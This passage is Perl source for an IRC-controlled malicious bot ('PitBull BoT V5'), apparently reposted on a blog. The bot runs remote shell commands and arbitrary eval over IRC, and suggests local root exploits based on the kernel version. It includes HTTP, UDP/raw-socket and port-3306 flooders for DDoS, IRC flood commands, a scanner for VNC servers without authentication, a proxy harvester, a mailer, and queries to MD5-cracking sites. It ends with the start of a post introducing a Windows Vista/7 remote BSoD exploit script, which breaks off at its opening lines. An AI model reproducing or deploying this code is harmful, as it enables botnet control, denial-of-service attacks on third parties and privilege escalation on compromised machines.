(.*)<\/description>/g)
{
push(@ttt1,$1);
}
foreach $x (0..(@ttt - 1))
{
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ PacketStorm 12] ".$ttt[$x]." ".$ttt1[$x]."");
sleep 3;
$c++;
}
}
if ($funcarg =~ /^rootable/) {
my $khost = `uname -r`;
my $currentid = `whoami`;
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Rootable 12] Currently you are ".$currentid." ");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Rootable 12] The kernel of this box is ".$khost." ");
chomp($khost);
my %h;
$h{'w00t'} = {
vuln=>['2.4.18','2.4.10','2.4.21','2.4.19','2.4.17','2.4.16','2.4.20']
};
$h{'brk'} = {
vuln=>['2.4.22','2.4.21','2.4.10','2.4.20']
};
$h{'ave'} = {
vuln=>['2.4.19','2.4.20']
};
$h{'elflbl'} = {
vuln=>['2.4.29']
};
$h{'elfdump'} = {
vuln=>['2.4.27']
};
$h{'expand_stack'} = {
vuln=>['2.4.29']
};
$h{'h00lyshit'} = {
vuln=>['2.6.8','2.6.10','2.6.11','2.6.9','2.6.7','2.6.13','2.6.14','2.6.15','2.6.16','2.6.2']
};
$h{'kdump'} = {
vuln=>['2.6.13']
};
$h{'km2'} = {
vuln=>['2.4.18','2.4.22']
};
$h{'krad'} = {
vuln=>['2.6.11']
};
$h{'krad3'} = {
vuln=>['2.6.11','2.6.9']
};
$h{'local26'} = {
vuln=>['2.6.13']
};
$h{'loko'} = {
vuln=>['2.4.22','2.4.23','2.4.24']
};
$h{'mremap_pte'} = {
vuln=>['2.4.20','2.2.25','2.4.24']
};
$h{'newlocal'} = {
vuln=>['2.4.17','2.4.19','2.4.18']
};
$h{'ong_bak'} = {
vuln=>['2.4.','2.6.']
};
$h{'ptrace'} = {
vuln=>['2.2.','2.4.22']
};
$h{'ptrace_kmod'} = {
vuln=>['2.4.2']
};
$h{'ptrace24'} = {
vuln=>['2.4.9']
};
$h{'pwned'} = {
vuln=>['2.4.','2.6.']
};
$h{'py2'} = {
vuln=>['2.6.9','2.6.17','2.6.15','2.6.13']
};
$h{'raptor_prctl'} = {
vuln=>['2.6.13','2.6.17','2.6.16','2.6.13']
};
$h{'prctl3'} = {
vuln=>['2.6.13','2.6.17','2.6.9']
};
$h{'remap'} = {
vuln=>['2.4.']
};
$h{'rip'} = {
vuln=>['2.2.']
};
$h{'stackgrow2'} = {
vuln=>['2.4.29','2.6.10']
};
$h{'uselib24'} = {
vuln=>['2.4.29','2.6.10','2.4.22','2.4.25']
};
$h{'newsmp'} = {
vuln=>['2.6.']
};
$h{'smpracer'} = {
vuln=>['2.4.29']
};
$h{'loginx'} = {
vuln=>['2.4.22']
};
$h{'exp.sh'} = {
vuln=>['2.6.9','2.6.10','2.6.16','2.6.13']
};
$h{'prctl'} = {
vuln=>['2.6.']
};
$h{'kmdx'} = {
vuln=>['2.6.','2.4.']
};
$h{'raptor'} = {
vuln=>['2.6.13','2.6.14','2.6.15','2.6.16']
};
$h{'raptor2'} = {
vuln=>['2.6.13','2.6.14','2.6.15','2.6.16']
};
foreach my $key(keys %h){
foreach my $kernel ( @{ $h{$key}{'vuln'} } ){
if($khost=~/^$kernel/){
chop($kernel) if ($kernel=~/.$/);
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Rootable 12] Possible Local Root Exploits: ". $key ." ");
}
}
}
}
#Pr0xy Scan
if ($funcarg =~ /^proxy\s+(.*)/) {
my @User_Agent = &Agent();
my $str = $1;
if ($str =~ m/^(a|anon|anonymous)$/i) { $str = "anonymous";}
elsif ($str =~ m/^(transparent|tp|t)$/i) { $str = "transparent";}
elsif ($str =~ m/^(h|high|e|elite)$/i) { $str = "high anonymity";}
my @type = "$str";
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ProxySearcher 12] Search Type: $str");
my @ttt=();
my @ttt1=();
my @ttt2=();
my @ttt3=();
my $sockt = IO::Socket::INET->new(PeerAddr=>"publicproxyservers.com",PeerPort=>"80",Proto=>"tcp") or return;
print $sockt "GET http://www.publicproxyservers.com/page1.html HTTP/1.0\r\nHost: publicproxyservers.com\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @rara = <$sockt>;
$page="@rara";
close($sockt);
while ($page =~ m//g)
{
push(@ttt,$1);
}
while ($page =~ m/ | ([A-Z].*)<\/td>/g)
{
push(@ttt1,$1);
}
while ($page =~ m/ | (.*)<\/td>/g)
{
push(@ttt2,$1);
}
while ($page =~ m/ | (anonymous|transparent|high anonymity)<\/td>/g)
{
push(@ttt3,$1);
}
foreach $proxyyy (0..(@ttt - 1))
{
if ($ttt3[$proxyyy] =~ /@type/)
{
( my $a, my $ipaddr ) = split( />/, $ttt[$x]);
my $prox="".$ipaddr.":".$ttt2[$proxyyy]."";
my $ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;
$ua->agent($User_Agent[rand(scalar(@User_Agent))]);
$ua->proxy('http', 'http://'.$prox);
my $response = $ua->get("http://www.google.com/search?q=The_PitBull");
if ($response->is_success)
{
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ProxySearcher 12] 4 ".$ipaddr.":".$ttt2[$proxyyy]." 12- 4 $ttt1[$proxyyy] 12- 4 $ttt3[$proxyyy] 12- OK!");
}
}
}
done;
}
# A simple mailer, @sendmail
if ($funcarg =~ /^sendmail\s+(.*)\s+(.*)\s+(.*)\s+(.*)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Mailer 12] Sending Mail to : 2 $3");
$subject = $1;
$sender = $2;
$recipient = $3;
@corpo = $4;
$mailtype = "content-type: text/html";
$sendmail = '/usr/sbin/sendmail';
open (SENDMAIL, "| $sendmail -t");
print SENDMAIL "$mailtype\n";
print SENDMAIL "Subject: $subject\n";
print SENDMAIL "From: $sender\n";
print SENDMAIL "To: $recipient\n\n";
print SENDMAIL "@corpo\n\n";
close (SENDMAIL);
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Mailer 12] Mail Sended To : 2 $recipient");
}
#SQL Fl00dEr
if ($funcarg =~ /^sqlflood\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ SQL-DDOS 12] Attacking 4 ".$1." 12 on port 3306 for 4 ".$2." 12 seconds .");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>3306);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ SQL-DDOS 12] Attacking done 4 ".$1.".");
}
#r0xb0t 4.6 VNC ScaNNer by iNs
if ($funcarg =~ /^vnc\s+(.*)/) {
my $MAX_SOCKET_TIME = 2;
my $MAX_CONNECT_TIME = 3;
#&ftpcheckm($printl);
my @hosts;
my $MAX_PROCESSES=100;
my $host=$1;
#my $victim=$host;
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ VNC 12] :::: IP Range: 4 $host* ");
$|=1;
foreach (0..255) {
my $pre="$host.$_.";
foreach (1..255) {
push(@hosts,$pre.$_);
}
}
my @pids;
my $npids=0;
for $victim (@hosts){
my $pid;
$pid=fork();
if($pid>0){
$npids++;
if($npids>=$MAX_PROCESSES){
for(1..($MAX_PROCESSES)){
$wait_ret=wait();
if($wait_ret>0){
$npids--;
}
}
}
next;
} elsif(undef $pid) {
# print "fork error\n" if ($DEBUG);
exit(0);
}else{
my($proto,$port);
$0="";
# kill thread on timeout
local $SIG{'ALRM'} = sub { exit(0); };
alarm $MAX_SOCKET_TIME;
my $port=5900;
print "Connecting to $victim:$port..."; #$| = 1;
($sock = IO::Socket::INET->new(PeerAddr => $victim,
PeerPort => $port,
Proto => 'tcp',)) ? print "\n"
: die("\n");
#negotiate protocol
$sock->read($protocol_version,12);
print $sock $protocol_version;
#print "Using protocol $protocol_version";
# get security types that we'll be ignoring
$sock->read($security_types,1);
$sock->read($hahaha,unpack('C',$security_types));
# choose no authentication
print $sock "\x01";
# we should get "0000" back
$sock->read($in,4);
if(unpack('I',$in)) { die("\n") };
# client initialize
print $sock "\x01";
# if the server starts sending data we are in
$sock->read($in,4);
(unpack('I',$in)) ?
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ VNC 12] :::: 4 ".$victim." 12is Vulnerable using protocol 4 ".$protocol_version)
#print("Vulnerable!\n")
: die("\n") ;
exit;
}
}
for(1..$npids){
my $wt=wait();
if($wt==-1){
# print "hey $!\n" if($DEBUG);
redo;
}
}
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ VNC 12] :::: Finished Scan for 4 $host ");
}
#-#-#-#-#-#-#-#-#
# IRC #
#-#-#-#-#-#-#-#-#
# join a other channel, @join #channel
if ($funcarg =~ /^join (.*)/) {
sendraw($IRC_cur_socket, "JOIN ".$1);
}
# part a other channel, @part #channel
if ($funcarg =~ /^part (.*)/) {
sendraw($IRC_cur_socket, "PART ".$1);
}
# quit irc, @quit
if ($funcarg =~ /^quit (.*)/) {
sendraw($IRC_cur_socket, "QUIT ".$1);
}
# voice, @voice
if ($funcarg =~ /^voice (.*)/) {
sendraw($IRC_cur_socket, "MODE $printl +v ".$1);
}
# devoice, @devoice
if ($funcarg =~ /^devoice (.*)/) {
sendraw($IRC_cur_socket, "MODE $printl -v ".$1);
}
# halfop, @halfop
if ($funcarg =~ /^halfop (.*)/) {
sendraw($IRC_cur_socket, "MODE $printl +h ".$1);
}
# dehalfop, @dehalfop
if ($funcarg =~ /^dehalfop (.*)/) {
sendraw($IRC_cur_socket, "MODE $printl -h ".$1);
}
# op, @op
if ($funcarg =~ /^op (.*)/) {
sendraw($IRC_cur_socket, "MODE $printl +o ".$1);
}
# deop, @deop
if ($funcarg =~ /^deop (.*)/) {
sendraw($IRC_cur_socket, "MODE $printl -o ".$1);
}
# +Q, @owner
if ($funcarg =~ /^owner (.*)/) {
sendraw($IRC_cur_socket, "MODE $printl +q ".$1);
}
# -Q, @deowner
if ($funcarg =~ /^deowner (.*)/) {
sendraw($IRC_cur_socket, "MODE $printl -q ".$1);
}
#-#-#-#-#-#-#-#-#
# Flooders IRC #
#-#-#-#-#-#-#-#-#
# msg, @msgflood
if ($funcarg =~ /^msgflood (.+?) (.*)/) {
for($i=0; $i<=10; $i+=1){
sendraw($IRC_cur_socket, "PRIVMSG ".$1." ".$2);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MSGFlood 12] 14 Excecuted on ".$1." ");
}
# dccflood, @dccflood
if ($funcarg =~ /^dccflood (.*)/) {
for($i=0; $i<=10; $i+=1){
sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001DCC CHAT chat 1121485131 1024\001\n");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ DCCFlood 12] 14 Excecuted on ".$1." ");
}
# ctcpflood, @ctcpflood
if ($funcarg =~ /^ctcpflood (.*)/) {
for($i=0; $i<=10; $i+=1){
sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001VERSION\001\n");
sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001PING\001\n");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ CTCPFlood 12] 14 Excecuted on ".$1." ");
}
# noticeflood, @noticeflood
if ($funcarg =~ /^noticeflood (.*)/) {
for($i=0; $i<=10; $i+=1){
sendraw($IRC_cur_socket, "NOTICE ".$1." :PitBull BoT V5\n");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ NoticeFlood 12] 14 Excecuted on ".$1." ");
}
# Channel Flood, @channelflood
if ($funcarg =~ /^channelflood/) {
for($i=0; $i<=25; $i+=1){
sendraw($IRC_cur_socket, "JOIN #".(int(rand(99999))) );
}
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ChannelFlood 12] 14 Excecuted ");
}
# Maxi Flood, @maxiflood
if ($funcarg =~ /^maxiflood(.*)/) {
for($i=0; $i<=15; $i+=1){
sendraw($IRC_cur_socket, "NOTICE ".$1." :PitBull BoT V5 M4Xi-Fl00d\n");
sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001VERSION\001\n");
sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001PING\001\n");
sendraw($IRC_cur_socket, "PRIVMSG ".$1." :PitBull BoT V5 M4Xi-Fl00d\n");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ M4Xi-Fl00d 12] 14 Excecuted on ".$1." ");
}
#-#-#-#-#-#-#-#-#
# DDOS #
#-#-#-#-#-#-#-#-#
#HTTP Flooder
if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ HTTP-DDOS 12] Attacking 4 ".$1." 12 on port 80 for 4 ".$2." 12 seconds .");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ HTTP-DDOS 12] Attacking done 4 ".$1.".");
}
# UDP Flooder
if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ UDP-DDOS 12] Attacking 4 ".$1." 12 with 4 ".$2." 12 Kb Packets for 4 ".$3." 12 seconds. ");
my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ UDP-DDOS 12] 12Results 4 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 12Kb in 4 ".$dtime." 12seconds to 4 ".$1.".");
}
exit;
}
}
sub ircase {
my ($kem, $printl, $case) = @_;
if ($case =~ /^join (.*)/) {
j("$1");
}
if ($case =~ /^part (.*)/) {
p("$1");
}
if ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
}
else {
p("$chan");
j("$chan");
}
}
if ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
if ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
}
if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
if ($case =~ /^nick (.*)/) {
nick("$1");
}
if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", 6667);
}
if ($case =~ /^raw (.*)/) {
sendraw("$1");
}
if ($case =~ /^eval (.*)/) {
eval "$1";
}
}
sub shell {
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "No such file or directory");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ SH3LL 12] 14 $linha");
if ($c == "$max_lines") {
$c=0;
sleep $sleeping;
}
}
exit;
}
}
}
sub Agent(){
my @ret = (
"Microsoft Internet Explorer/4.0b1 (Windows 95)",
"Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)",
"Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)",
"Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)",
"Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)",
"Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)",
"Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)",
"Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",
"Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Win32)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)",
"Microsoft Pocket Internet Explorer/0.6",
"Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)",
"MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;",
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)",
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)",
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)",
"Advanced Browser (http://www.avantbrowser.com)",
"Avant Browser (http://www.avantbrowser.com)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)",
"Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)",
"Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)",
"Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511",
"Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox",
"Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1",
"Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b",
"Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0",
"Mozilla/3.0 (OS/2; U)",
"Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)",
"Mozilla/4.61 (Macintosh; I; PPC)",
"Mozilla/4.61 [en] (OS/2; U)",
"Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)",
"Mozilla/4.8 [en] (Windows NT 5.0; U)" );
return(@ret);
}
sub udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $port = 1;
$port <= 65000; $port++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{tcp}++;
for (my $pc = 3;
$pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{o}++;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub j {
&join(@_);
}
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_);
}
sub part {
sendraw("PART $_[0]");
}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub quit {
sendraw("QUIT :$_[0]");
}
sub ice(){
my $md5hash = $_[1];
chomp $md5hash;
my $query = "http://ice.breaker.free.fr/md5.php?hash=".$md5hash;
my $checker = query($query);
if ($checker =~ m/
- (.*?)
/g) {
my $cracked="$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-ice.breaker.free.fr 4@ 12 ] 4 ==> ".$cracked."");
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-ice.breaker.free.fr 4@ 12 ] 1 Has not Found.");
}}
sub gdata(){
my $md5hash = $_[1];
chomp $md5hash;
my $query = "http://www.gdataonline.com/qkhash.php?mode=txt&hash=".$md5hash;
my $checker = query($query);
if ($checker =~ m/(.*?)<\/b><\/td>/g) {
my $cracked="$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-gdataonline.com 4@ 12 ] 4 ==> ".$cracked."");
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-gdataonline.com 4@ 12 ] 1 Has not Found.");
}}
sub redn(){
my $md5hash = $_[1];
chomp $md5hash;
my $query = "http://md5.rednoize.com/?p&s=md5&q=".$md5hash;
my $checker = query($query);
if ($checker =~ m/<(.*)/g) {
my $cracked="$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-rednoize.com 4@ 12 ] 4 ==> ".$cracked);
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-rednoize.com 4@ 12 ] 1 Has not Found.");
}}
sub xpz(){
my $md5hash = $_[1];
chomp $md5hash;
my $query = "http://md5.xpzone.de/?string=".$md5hash."&mode=decrypt";
my $checker = query($query);
if ($checker =~ m/(.*)<\/b>/g) {
my $cracked="$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-xpzone.de 4@ 12 ] 4 ==> ".$cracked);
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-xpzone.de 4@ 12 ] 1 Has not Found.");
}}
sub ben(){
my $md5hash = $_[1];
chomp $md5hash;
my $query = "http://md5.benramsey.com/md5.php?hash=".$md5hash;
my $checker = query($query);
if ($checker =~ m/<\!\[CDATA\[(.+?)\]\]><\/string>/g) {
my $cracked="$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-benramsey.com 4@ 12 ] 4 ==> ".$cracked);
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-benramsey.com 4@ 12 ] 1 Has not Found.");
}}
sub alim(){
my $md5hash = $_[1];
chomp $md5hash;
my $query = "http://alimamed.pp.ru/md5/?md5e=&md5d=".$md5hash;
my $checker = query($query);
if ($checker =~ m/(.+?)<\/b>/g) {
my $cracked="$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-alimamed.pp.ru 4@ 12 ] 4 ==> ".$cracked);
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-alimamed.pp.ru 4@ 12 ] 1 Has not Found.");
}}
sub cry(){
my $md5hash = $_[1];
chomp $md5hash;
my $query = "http://us.md5.crysm.net/find?md5=".$md5hash;
my $checker = query($query);
if ($checker =~ m/(.+?)<\/li>/g) {
my $cracked="$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-crysm.net 4@ 12 ] 4 ==> ".$cracked);
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-crysm.net 4@ 12 ] 1 Has not Found.");
}}
sub query($) {
my $url=$_[0];
$url=~s/http:\/\///;
my $host=$url;
my $query=$url;
my $page="";
$host=~s/href=\"?http:\/\///;
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query=~s/$host//;
if ($query eq "") { $query="/";};
eval {
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
close($sock);
};
return $page;
}
sub fix_url($) {
my $str=$_[0];
if ($str =~ m/^http:\/\/(.*)/i || $str =~ m/^https:\/\/(.*)/i) {
$set="".$str."";
}
else {
$set="http://".$str."";
}
return $set;
}
sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
eval {
local $SIG{ALRM} = sub { die "1";};
alarm 10;
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
alarm 0;
close($sock);
};
return $page;
}
}
==========================================================
Baca Selengkapnya...
Mizok Bot V3.2 PRiVaTE Sh3llBoT
*This exploit is a remote BSoD vulnerability for winvista and windows 7 machines, some have been patched, and some machines haven't been patched*
Today, I was talking to my friend gotroot and I asked him if it was possible to convert this python exploit (the python version of this exploit) and convert it to Perl, so I ended up doing that with some help from him, he told me about the "use strict;" function and about "my" but the rest of the code I knew already :)
Here is the exploit code:
==============================================================
#!/usr/bin/perl
use IO::Socket;
use strict;
my $host = $ARGV[0];
if($host) {
} else {
